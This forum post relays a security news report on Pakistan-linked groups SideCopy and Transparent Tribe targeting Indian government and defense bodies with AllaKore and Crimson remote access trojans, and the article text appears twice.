Father
Professional
- Messages
- 2,602
- Reaction score
- 761
- Points
- 113
Two groups of hackers distribute their Trojans at once, working closely with each other.
In recent weeks, cyber attacks on Indian government agencies initiated by groups with ties to Pakistan have increased. The Seqrite Labs analytical team identified several campaigns that actively used Remote Access Trojans (RAT). Experts confirmed the connection between the SideCopy and Transparent Tribe (APT36) groupings, finding similarities in the program code and sharing the same C2 infrastructure.
It is noted that the SideCopy group used AllaKore RAT in three campaigns, and in each of them hackers deployed two copies of the Trojan at once. Transparent Tribe, in turn, actively uses Crimson RAT, applying it in encrypted and packaged forms.
The main targets of these cyber attacks are defense and government structures in India. Both groups have been aggressively trying to infiltrate these sectors since at least 2019. The growth of such malicious activity is accompanied by a constant increase in sales of access to the systems of Indian organizations on underground forums.
The infection process usually starts with a phishing email containing an archive with a shortcut file, which starts a hidden process followed by downloading malicious files from compromised domains.
Remote access Trojans deployed in the system are able to collect information about the system, manage files, and intercept clipboard data, demonstrating a high degree of threat when it comes to military installations in the country.
SideCopy and Transparent Tribe use encrypted strings to communicate with C2 servers, which makes it difficult to detect malicious operations. Compromised domains and IP addresses used in campaigns allow you to track the activity of groups from last year.
Due to the increase in cyber attacks in the run-up to the Indian elections, experts recommend that local organizations strengthen their cybersecurity measures. Analysts emphasize the need to protect against threats, especially in the context of global geopolitical conflicts that can provoke new attacks.
Thus, the observed increase in cyber attacks on India requires increased attention to cybersecurity at the state and corporate levels, as well as increased international cooperation in countering such cyber threats.
In recent weeks, cyber attacks on Indian government agencies initiated by groups with ties to Pakistan have increased. The Seqrite Labs analytical team identified several campaigns that actively used Remote Access Trojans (RAT). Experts confirmed the connection between the SideCopy and Transparent Tribe (APT36) groupings, finding similarities in the program code and sharing the same C2 infrastructure.
It is noted that the SideCopy group used AllaKore RAT in three campaigns, and in each of them hackers deployed two copies of the Trojan at once. Transparent Tribe, in turn, actively uses Crimson RAT, applying it in encrypted and packaged forms.
The main targets of these cyber attacks are defense and government structures in India. Both groups have been aggressively trying to infiltrate these sectors since at least 2019. The growth of such malicious activity is accompanied by a constant increase in sales of access to the systems of Indian organizations on underground forums.
The infection process usually starts with a phishing email containing an archive with a shortcut file, which starts a hidden process followed by downloading malicious files from compromised domains.
Remote access Trojans deployed in the system are able to collect information about the system, manage files, and intercept clipboard data, demonstrating a high degree of threat when it comes to military installations in the country.
SideCopy and Transparent Tribe use encrypted strings to communicate with C2 servers, which makes it difficult to detect malicious operations. Compromised domains and IP addresses used in campaigns allow you to track the activity of groups from last year.
Due to the increase in cyber attacks in the run-up to the Indian elections, experts recommend that local organizations strengthen their cybersecurity measures. Analysts emphasize the need to protect against threats, especially in the context of global geopolitical conflicts that can provoke new attacks.
Thus, the observed increase in cyber attacks on India requires increased attention to cybersecurity at the state and corporate levels, as well as increased international cooperation in countering such cyber threats.
